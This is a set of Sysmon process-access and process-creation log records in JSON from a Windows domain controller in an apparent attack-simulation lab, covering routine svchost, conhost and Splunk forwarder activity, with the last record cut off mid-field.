{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.569\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2168-5F25-0000-0010CF880900}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.569","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2168-5F25-0000-0010CF880900}","TargetProcessId":"4964","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.710\r\nSourceProcessGUID: {41C8662E-2168-5F25-0000-0010CF880900}\r\nSourceProcessId: 4964\r\nSourceThreadId: 4352\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.710","SourceProcessGUID":"{41C8662E-2168-5F25-0000-0010CF880900}","SourceProcessId":"4964","SourceThreadId":"4352","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nProcessGuid: {41C8662E-2169-5F25-0000-0010328B0900}\r\nProcessId: 2456\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:01:45.788","ProcessGuid":"{41C8662E-2169-5F25-0000-0010328B0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:01:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6248,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:45.788\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2169-5F25-0000-0010328B0900}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 